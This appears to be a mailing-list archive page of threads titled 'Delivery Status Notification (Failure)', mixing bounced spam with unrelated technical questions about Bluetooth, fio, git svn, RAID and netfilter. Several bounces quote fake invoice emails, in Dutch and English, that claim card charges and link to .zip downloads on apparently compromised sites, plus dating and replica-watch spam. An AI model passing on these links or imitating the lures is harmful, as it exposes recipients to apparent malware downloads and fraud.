http://www.thunshop45nord.it/clientedown/Invoice.zip?ticetid546709767Billingid=a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org


Meer informatie kunt u de volgorde vinden die in uw account

Met vriendelijke groet,
Ticket Service
Tel./Fax.: +31 (70) 538-78-76



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-17  4:47 postmaster-EsMd/MeLYiF8uUxBSJOaYoYkZiVZrdSR2LY78lusg7I
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-EsMd/MeLYiF8uUxBSJOaYoYkZiVZrdSR2LY78lusg7I @ 2011-11-17  4:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 174 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       messagelabs-bulA9WBj4C9mR6Xm/wNWPw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 360 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2852 bytes --]

From: "Billing" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <willem.matapere-bulA9WBj4C9mR6Xm/wNWPw@public.gmane.org>
Subject: BTW factuur #695363
Date: Thu, 17 Nov 2011 04:47:51 +0000
Message-ID: <004001cca4e4$0e850880$14000a0a@MCNserver1>



Goedendag, willem.matapere-bulA9WBj4C94mq39ihy3YQ@public.gmane.org

Op verzoek sturen wij u een BTW-factuur.

Hartelijk dank voor uw medewerking!
http://www.crdd.it/clientedown/Info.zip?ticetid40467965Billingid=willem.matapere-bulA9WBj4C9mR6Xm/wNWPw@public.gmane.org




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-15 18:46 postmaster-DMvgxKAs6cU
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-DMvgxKAs6cU @ 2011-11-15 18:46 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 163 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       glitterpaty-DMvgxKAs6cU@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 215 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2220 bytes --]

From: "OrderCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <glitterpaty-DMvgxKAs6cU@public.gmane.org>
Subject: Factuur 017539-784456
Date: Tue, 15 Nov 2011 18:46:39 +0000
Message-ID: <44837728.89543159741597-QHT31ff7oBgJ6fTLyRp1Vlc0O+juaISAQQ4Iyu8u01E@public.gmane.org>



Werk uw accountgegevens.
http://mmu.ro/clientedown/Order.zip?id:4248564549Generation_user=glitterpaty-DMvgxKAs6cU@public.gmane.org

____________
Best regards, 
ticket service.




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-15 14:13 postmaster-mTV6ATcrTWY
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-mTV6ATcrTWY @ 2011-11-15 14:13 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 173 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       duco.bruns-//i/cWCPw뼿ꥥ븻褺@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 238 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2180 bytes --]

From: "Consult2 " <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <duco.bruns-//i/cWCPw+vz+pZb47iToQ@public.gmane.org>
Subject: [SPAM] Factuur | 616459-660300
Date: Tue, 15 Nov 2011 14:13:19 +0000
Message-ID: <009301cca3a0$b85b7c80$0200a8c0-QHT31ff7oBgJ6fTLyRp1Vlc0O+juaISAQQ4Iyu8u01E@public.gmane.org>




Goedendag, duco.bruns.
Dank u voor de bestelling,
id: 5169461968.

Uw creditcard wordt in rekening gebracht voor 999 euro.

Informatie over de bestelling en levering vinden op:
http://www.cooljohn.gr/clientedown/Invoice.zip?id:9826080588Generation_user=duco.bruns-//i/cWCPw+vz+pZb47iToQ@public.gmane.org

==
Tel./Fax.: +31 (20) 955-94-01




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-15 13:05 postmaster-DeuEFqYn60tmR6Xm/wNWPw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-DeuEFqYn60tmR6Xm/wNWPw @ 2011-11-15 13:05 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 178 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       defensivenesss3-DeuEFqYn60tmR6Xm/wNWPw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 236 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1397 bytes --]

From: "Invoice" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <defensivenesss3-DeuEFqYn60tmR6Xm/wNWPw@public.gmane.org>
Subject: Factuur | 170861-300144
Date: Tue, 15 Nov 2011 13:06:02 +0000
Message-ID: <007801cca397$51859580$14000a0a-QHT31ff7oBgJ6fTLyRp1Vlc0O+juaISAQQ4Iyu8u01E@public.gmane.org>




Hallo,

Dank u voor de bestelling,

Dit bericht is om u te informeren dat uw bestelling is ontvangen
en wordt momenteel verwerkt.

Uw bestelling referentie is 430666487.

Uw creditcard wordt in rekening gebracht voor 963 euro.

Informatie over de bestelling en levering vinden op:
http://merlin.iglu.cz/clientedown/Order.zip?id:01633Generation_user=defensivenesss3-DeuEFqYn60tmR6Xm/wNWPw@public.gmane.org

____________________________
Best regards, ticket service.
Tel./Fax.: +31 (40) 206-46-51.              




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-15  9:13 postmaster-SJlmH/QgL93GjfRZg6uqBA
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-SJlmH/QgL93GjfRZg6uqBA @ 2011-11-15  9:13 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 174 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       bflevolande-SJlmH/QgL93GjfRZg6uqBA@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 244 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1273 bytes --]

From: "PAY" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <bflevolande-SJlmH/QgL93GjfRZg6uqBA@public.gmane.org>
Subject: Factuur | 359700-371303
Date: Tue, 15 Nov 2011 09:13:02 +0000
Message-ID: <013639318.37002177364150-QHT31ff7oBgJ6fTLyRp1Vlc0O+juaISAQQ4Iyu8u01E@public.gmane.org>



Werk uw accountgegevens.
http://biosbalance.gr/clientedown/Order.zip?id:68471Generation_user=bflevolande-SJlmH/QgL93GjfRZg6uqBA@public.gmane.org

____________
Best regards, 
ticket service.




[-- Attachment #2: Type: text/plain, Size: 93 bytes --]

***disclaimer***
http://www.flevoland.nl/producten-en-diensten/disclaimer-e-mail/index.xml

[-- Attachment #3: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-15  5:29 postmaster-cK1r3kULcUuEVqv0pETR8A
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-cK1r3kULcUuEVqv0pETR8A @ 2011-11-15  5:29 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 174 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       akelectrode-cK1r3kULcUuEVqv0pETR8A@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 235 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1547 bytes --]

From: "Pay" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <akelectrode-cK1r3kULcUuEVqv0pETR8A@public.gmane.org>
Subject: Factuur - 337298-500069.
Date: Tue, 15 Nov 2011 05:30:36 +0000
Message-ID: <55235587.36688591374439-QHT31ff7oBgJ6fTLyRp1Vlc0O+juaISAQQ4Iyu8u01E@public.gmane.org>




Dear User, 

Thank you for the order, 

your credit card will be charged for 196 dollars.
For more information, please visit our web site:
http://healthmatrix.net/clientedown/Info.zip?id:812413Generation_user=akelectrode-cK1r3kULcUuEVqv0pETR8A@public.gmane.org


____________
Best regards, ticket service.
Tel./Fax.: +31 (40) 811-24-62




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-07-11  8:13 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2011-07-11  8:13 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     veneto.responsabile-AuFegirpr3Rg9hUCZPvPmw@public.gmane.org

Technical details of permanent failure: 
Message rejected by Google Groups. Please visit http://mail.google.com/support/bin/answer.py?hl=en&answer=188131 to review our Bulk Email Senders Guidelines.

----- Original message -----

Received: by 10.223.91.75 with SMTP id l11mr7095938fam.66.1310372014493;
        Mon, 11 Jul 2011 01:13:34 -0700 (PDT)
Received: by 10.223.91.75 with SMTP id l11mr7095936fam.66.1310372014466;
        Mon, 11 Jul 2011 01:13:34 -0700 (PDT)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from srv-fidotec.issp.es (srv-fidotec.issp.es [87.106.255.61])
        by mx.google.com with ESMTP id d18si11173740fan.108.2011.07.11.01.13.26;
        Mon, 11 Jul 2011 01:13:26 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 87.106.255.61 as permitted sender) client-ip=87.106.255.61;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 87.106.255.61 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on srv-fidotec
X-Spam-Flag: YES
X-Spam-Level: ********
X-Spam-Status: Yes, score=8.0 required=7.0 tests=BAYES_99,DATE_IN_FUTURE_03_06,
	RDNS_NONE autolearn=no version=3.3.1
X-Spam-Report: *  3.8 BAYES_99 BODY: Bayes spam probability is 99 to 100%
	*      [score: 1.0000]
	*  3.0 DATE_IN_FUTURE_03_06 Date: is 3 to 6 hours after Received: date
	*  1.2 RDNS_NONE Delivered to internal network by a host with no rDNS
Received: from hs-693.dedicated.hostalia.com ([82.194.85.75]) by issp.es with MailEnable ESMTP; Mon, 11 Jul 2011 10:13:25 +0200
Received: from [82.194.85.75] by hs-693.dedicated.hostalia.com id UFvZqsoJePnh with SMTP; Mon, 11 Jul 2011 07:29:54 -0400
Date: Mon, 11 Jul 2011 07:29:54 -0400
From: "katya" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
X-Mailer: The Bat! (v4.4.66.4) Business
X-Priority: 3 (Normal)
Message-ID: <70113324.62214173056694-piVv0PyeQy2fqzSq9kmGN8Wq2KfUq7yvgfoxzgwHRXE@public.gmane.org>
To: <veneto.responsabile-AuFegirpr3Rg9hUCZPvPmw@public.gmane.org>
Subject: Voglio trovare l'amore.
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------28259C2C3E5DB9"

la mia e-mail: bluberry-lNJCuXPsU20S+FvcfC7Uqw@public.gmane.org
Il mio nome e Ekaterina! Io sono dalla Russia vive nella citta di Sochi.
Se siete interessati a me, scrivimi in e-mail: bluberry-lNJCuXPsU20S+FvcfC7Uqw@public.gmane.org
Aspettero la tua lettera fedelmente Ekaterina!

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <000e0ce00a58298def04a6fca5b9@google.com>
@ 2011-07-01  7:06   ` Eponymous -
  0 siblings, 0 replies; 183+ messages in thread
From: Eponymous - @ 2011-07-01  7:06 UTC (permalink / raw)
  To: linux-bluetooth

Hmm, is this patch included/due to be included in later releases of
btusb? It sounds like a bug if you can't send ACL/SCO packets over a
RAW socket.... Am I wrong?

How exactly is everything packaged up? Is btusb part of the bluez
suite or is it a separate packaged?

Cheers.


> On Fri, Jul 1, 2011 at 7:59 AM, Markus Burvall <
> markus.burvall@swedenconnectivity.com> wrote:
>
>> **
>> Hello,
>>
>> For non SCO packets the fix from Kim works.
>>
>> Recompile btusb.c and use RAW mode.
>>
>> However it didn't work work SCO over RAW.
>>
>> http://lkml.org/lkml/2010/4/7/146
>>
>> Best Regards, Markus
>>
>>
>> On 2011-07-01 08:46, Eponymous - wrote:
>>
>> Thanks for the information.
>>
>> Hmm, I'm not sure what you mean about a "raw hci" socket. Could you
>> tell me how I can check this?
>>
>> I'm using a custom program that can communicate directly to the chip
>> over hci using bluez as a go-between. Does this help?
>>
>> Cheers.
>>
>> On Thu, Jun 30, 2011 at 4:47 PM, Peter Hurley <peter@hurleysoftware.com> <peter@hurleysoftware.com> wrote:
>>
>>  On Wed, 2011-06-29 at 06:22 -0400, Eponymous - wrote:
>>
>>  Thanks for your reply Peter.
>>
>> Sorry if I came across a bit rude there, it is just very frustrating
>> sometimes :)
>>
>>  I get it. BT can be <arggghhh>...
>>
>>
>>  You mentioned enabling debug messages for btusb and bluetooth. Do you
>> by any chance know how to do this?
>>
>>  I always run a debug kernel. My relevant build settings in the "Kernel
>> hacking" submenu are:
>>  Kernel Debugging => DEBUG_KERNEL=y
>>  Debug Filesystem => DEBUG_FS=y
>>  Compile the kernel with debug info => DEBUG_INFO=y
>> and most importantly,
>>  Enable dynamic printk() support DYNAMIC_DEBUG=y
>>
>> Then read the short dynamic debug howto in the kernel documentation:
>> Documentation/dynamic-debug-howto.txt (there are some copies online as
>> well if that's easier).
>>
>> Then when I want to see debug messages, I just enable those source
>> files. Eg.,
>> # echo -n 'file hci_core.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-06-09 11:05 postmaster-pwEU/PgbHn2CsG0aXnmMvw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-pwEU/PgbHn2CsG0aXnmMvw @ 2011-06-09 11:05 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 186 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       garryelmoresi-HusrHU7vuKP9Or1Bj5QYaRCuuivNXqWP@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 466 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 288 bytes --]

From:  "Lencik" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <garryelmoresi-HusrHU7vuKP9Or1Bj5QYaRCuuivNXqWP@public.gmane.org>
Message-ID:  <80561421.82767166771934-XCb1e1iztw/CucBzCAjSVuTW4wlIGRCZ@public.gmane.org>
Subject:  I search for the person...


[-- Attachment #2: Type: text/plain, Size: 206 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linux-foundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <000e0cd5cff499795e04a05dc387@google.com>
@ 2011-04-08  2:41   ` David Xu
  0 siblings, 0 replies; 183+ messages in thread
From: David Xu @ 2011-04-08  2:41 UTC (permalink / raw)
  To: git

[-- Attachment #1: Type: text/plain, Size: 287 bytes --]

Hi, this is my revised proposal for git. I was unable to find a public bug
list, so I couldn't specify which bugs I would attempt to fix in the project
schedule. I apologize for this coming in a bit late, I had classes and an
interview today, so I just got back home.

Thank you!
-David

[-- Attachment #2: git-v2.docx --]
[-- Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document, Size: 18673 bytes --]

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2011-02-14  8:08   ` wu meng
@ 2011-02-14  9:15     ` Jens Axboe
  0 siblings, 0 replies; 183+ messages in thread
From: Jens Axboe @ 2011-02-14  9:15 UTC (permalink / raw)
  To: wu meng; +Cc: fio

On 2011-02-14 09:08, wu meng wrote:
> Hi,
> 
> I've a problem on using fio:
> "buffered=bool If value is true, use buffered io. This is the opposite
> of the 'direct' option. Defaults to true."
> So what kind of buffer mean for this option? Is that mean kernel cache
> or user space buffer?

'direct' and 'buffered' control the same thing, they are just opposites.
Both refer to the use of kernel file cache bypass.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <20cf30564493a84040049c39612f@google.com>
@ 2011-02-14  8:08   ` wu meng
  2011-02-14  9:15     ` Jens Axboe
  0 siblings, 1 reply; 183+ messages in thread
From: wu meng @ 2011-02-14  8:08 UTC (permalink / raw)
  To: fio

Hi,

I've a problem on using fio:
"buffered=bool If value is true, use buffered io. This is the opposite
of the 'direct' option. Defaults to true."
So what kind of buffer mean for this option? Is that mean kernel cache
or user space buffer?

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2010-12-09 17:01 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2010-12-09 17:01 UTC (permalink / raw)
  To: containers-qjLDD68F18O7TbgM5vRIOg

Delivery to the following recipient failed permanently:

     containerproject-sIHpD95uFFcdnm+yROfE0A@public.gmane.org

Technical details of permanent failure: 
Message rejected. Please visit http://www.google.com/support/a/bin/answer.py?hl=en&answer=168383 to review our Bulk Email Senders Guidelines.

----- Original message -----

Received: by 10.90.82.3 with SMTP id f3mr11660494agb.83.1291914074256;
        Thu, 09 Dec 2010 09:01:14 -0800 (PST)
Received: by 10.90.82.3 with SMTP id f3mr11660493agb.83.1291914074198;
        Thu, 09 Dec 2010 09:01:14 -0800 (PST)
Return-Path: <containers-qjLDD68F18O7TbgM5vRIOg@public.gmane.org>
Received: from microsof-0bcf7e (109-167-41-234.dynamic.peoplenet.ua [109.167.41.234])
        by mx.google.com with SMTP id g26si4811693yhc.140.2010.12.09.09.01.08;
        Thu, 09 Dec 2010 09:01:14 -0800 (PST)
Received-SPF: fail (google.com: domain of containers-qjLDD68F18O7TbgM5vRIOg@public.gmane.org does not designate 109.167.41.234 as permitted sender) client-ip=109.167.41.234;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of containers-qjLDD68F18O7TbgM5vRIOg@public.gmane.org does not designate 109.167.41.234 as permitted sender) smtp.mail=containers-qjLDD68F18O7TbgM5vRIOg@public.gmane.org
Message-Id: <4d010b5a.a635ec0a.60f5.4df4SMTPIN_ADDED-ATjtLOhZ0NVl57MIdRCFDg@public.gmane.org>
From: Swiss Watches Rolex <no-replay-v7eC1BmvSlkAvxtiuMwx3w@public.gmane.org>
To: containerproject-sIHpD95uFFcdnm+yROfE0A@public.gmane.org
DATE: Thu, 9 Dec 2010 07:00:01 +0200
Subject: containerproject-sIHpD95uFFcdnm+yROfE0A@public.gmane.org Swiss Watches *ROLEX*  -20%
Mime-Version: 1.0
Content-type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit

----- End of message -----

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <0022152d6729673f6a0494b1f2e6@google.com>
@ 2010-11-10 12:25   ` miloofr
  0 siblings, 0 replies; 183+ messages in thread
From: miloofr @ 2010-11-10 12:25 UTC (permalink / raw)
  To: linux-wireless

Hi,
I would want to know what is the current state of the 8191su wireless
driver. I have a wifi USB stick from EDIMAX, the 7811Un model, which is
supposed to have a 8192su chip inside.
It is not recognized neither from latest Ubuntu 10.10 nor openSUSE
11.3 . However I have been able to make it work by compiling the
drivers proposed on the EDIMAX website, but this is only available for
32 bits systems/kernels.
I saw that there were some discussion 2 months ago about this port
from 32 to 64 bits, what is the current state today?

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] <001636833518b9ca2e049488651a@google.com>
@ 2010-11-08 10:52 ` J Webster
  0 siblings, 0 replies; 183+ messages in thread
From: J Webster @ 2010-11-08 10:52 UTC (permalink / raw)
  To: netfilter

I have a 100Mbps data centre connection.
I would like to limit users bandwidth to my server but only when it
becomes clogged.
It seems users report problems when the bandwidth gets above 7000kbits
per sec
I think this is caused by useres downloading many files rather than
streaming video.
I think 2000kbits per sec should be enough for streaming video so is
there a way to throttle this and share it equally between users anytime
the overall connection gets above 70000?


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <0015174c437c389602048ce7f16c@google.com>
@ 2010-08-03  9:31   ` Simon Grönlund
  0 siblings, 0 replies; 183+ messages in thread
From: Simon Grönlund @ 2010-08-03  9:31 UTC (permalink / raw)
  To: git

Since recent weekend I face an error trying to execute git svn fetch
-q. trying to build an index from scratch does not help.

$ git svn fetch
error: short read No such file or directory
fatal: Unable to add (null) to database
   at /usr/lib64/perl5/SVN/Ra.pm line 623

$ git --version
git version 1.7.2

$ svn --version
svn, version 1.6.9 (r901367)

$ sqlite3 --version
3.6.22

$ perl --version
This is perl, v5.10.1 (*) built for x86_64-linux-thread-multi

$ uname -a
Linux host 2.6.33.6-147.fc13.x86_64 #1 SMP Tue Jul 6 22:32:17 UTC 2010
x86_64 x86_64 x86_64 GNU/Linux

yum says
git-1.7.2-1.fc13.x86_64
subversion-1.6.9-2.fc13.x86_64
sqlite-3.6.22-1.fc13.x86_64
perl-5.10.1-114.fc13.x86_64

The error points me to perl5/SVN/Ra.pm line 623 which is at the lat line in
our $AUTOLOAD;
sub AUTOLOAD {
    my $class = ref($_[0]);
    $AUTOLOAD =~ s/^${class}::(SUPER::)?//;
    return if $AUTOLOAD =~ m/^[A-Z]/;

    my $self = shift;
    no strict 'refs';

    print $self, "\n";
    print $AUTOLOAD, "\n";
    print @_, "\n\n";

    my $method = $self->can("invoke_$AUTOLOAD")
        or die "no such method $AUTOLOAD";

    no warnings 'uninitialized';
    $method->(@$self, @_);
}

The 3 print-debug lines are added by me and they emits the following:
$ git svn fetch
SVN::Ra::Reporter=ARRAY(0x2b04418)
set_path
Use of uninitialized value $_[3] in print at
/usr/lib64/perl5/SVN/Ra.pm line 621.
721210SVN::Pool=REF(0x2b04130)

SVN::Ra::Reporter=ARRAY(0x2b04418)
set_path
Use of uninitialized value $_[3] in print at
/usr/lib64/perl5/SVN/Ra.pm line 621.
branches721210SVN::Pool=REF(0x2b04130)

SVN::Ra::Reporter=ARRAY(0x2b04418)
set_path
Use of uninitialized value $_[3] in print at
/usr/lib64/perl5/SVN/Ra.pm line 621.
branches/4.272117SVN::Pool=REF(0x2b04130)

SVN::Ra::Reporter=ARRAY(0x2b04418)
finish_report
SVN::Pool=REF(0x2b04130)

error: short read No such file or directory
fatal: Unable to add (null) to database
 at /usr/lib64/perl5/SVN/Ra.pm line 627

Unfortunately I have been unable to debug this further.




Git works flawlessly in this setup with another branch of the same SVN
repository but I have not been able to pinpoint which revision or what
else that can be wrong here.

Is this error introduced with the recent release of Git?
Is there some mismatch between Git, Svn, Perl, or Sqlite?

Grateful for tips or hints.

/Simon

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-05-27 12:10   ` Daniele Madama
@ 2010-05-27 21:00     ` Luca Berra
  0 siblings, 0 replies; 183+ messages in thread
From: Luca Berra @ 2010-05-27 21:00 UTC (permalink / raw)
  To: linux-raid

On Thu, May 27, 2010 at 02:10:16PM +0200, Daniele Madama wrote:
>Hi,
>sorry if the question is already posted, but I googled a lot without succes.
>I'm in the following scenario:
>I have a CentOS 5.5 server with a single HD installation, I'd like to add a
>second disk and put them in a RAID 1. I followed two guide [1] [2] but when
>I reboot the system I get a error [3] that tell me

looks like you missed the mkinitrd step.

L.

-- 
Luca Berra -- bluca@comedia.it
         Communication Media & Services S.r.l.
  /"\
  \ /     ASCII RIBBON CAMPAIGN
   X        AGAINST HTML MAIL
  / \

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <001485f795f4535fdd048790ecd6@google.com>
@ 2010-05-27 12:10   ` Daniele Madama
  2010-05-27 21:00     ` Luca Berra
  0 siblings, 1 reply; 183+ messages in thread
From: Daniele Madama @ 2010-05-27 12:10 UTC (permalink / raw)
  To: linux-raid

Hi,
sorry if the question is already posted, but I googled a lot without succes.
I'm in the following scenario:
I have a CentOS 5.5 server with a single HD installation, I'd like to add a
second disk and put them in a RAID 1. I followed two guide [1] [2] but when
I reboot the system I get a error [3] that tell me

....
Waiting for driver initialization.
Scanning and configuring dmraid supported devices
Creating root device.
Mounting root filesystem.
mount: could not find filesystem '/dev/root'
Setting up other filesystems.
Setting up new root fs
setuproot: moving /dev failed: No such file or directory
no fstab.sys, mounting internal defaults
setuproot: error mounting /proc: No such file or directory
setuproot: error mounting /sys: No such file or directory
Switching to new root and running init.
unmounting old /dev
unmounting old /proc
unmounting old /sys
switchroot: mount failed: No such file or directory
Kernel panic - not syncing: Attempted to kill init!

Can you give me a hint to proceed?

TIA,
Daniele


[1] http://www.howtoforge.org/how-to-set-up-software-raid1-on-a-running-system-incl-grub-configuration-centos-5.3
[2] http://www.geroleo.com/?p=524
[3] http://www.danysoft.org/img/raid-error.jpg

--
The box said "Requires Windows XP or better" .... so I
installed Linux !
-o=|=o-

Daniele Madama

http://www.danysoft.org

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <0016e646086875cfde0480f186a0@google.com>
@ 2010-03-04  3:53   ` Karthik Singaram Lakshmanan
  0 siblings, 0 replies; 183+ messages in thread
From: Karthik Singaram Lakshmanan @ 2010-03-04  3:53 UTC (permalink / raw)
  To: Linux RT

Hi,
    If I am not mistaken, higher value of sched_priority denotes
higher priority.
    Therefore, looking at
        normal_prio = MAX_RT_PRIO - 1 - task->rt_priority;
        you can see that a higher task->rt_priority will translate to
a lower value of normal_prio, thereby occupying an earlier bit.

Hope that helps
- Karthik
--
To unsubscribe from this list: send the line "unsubscribe linux-rt-users" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-02-02  4:30         ` Frank Li
@ 2010-02-02  6:37           ` Laszlo Papp
  0 siblings, 0 replies; 183+ messages in thread
From: Laszlo Papp @ 2010-02-02  6:37 UTC (permalink / raw)
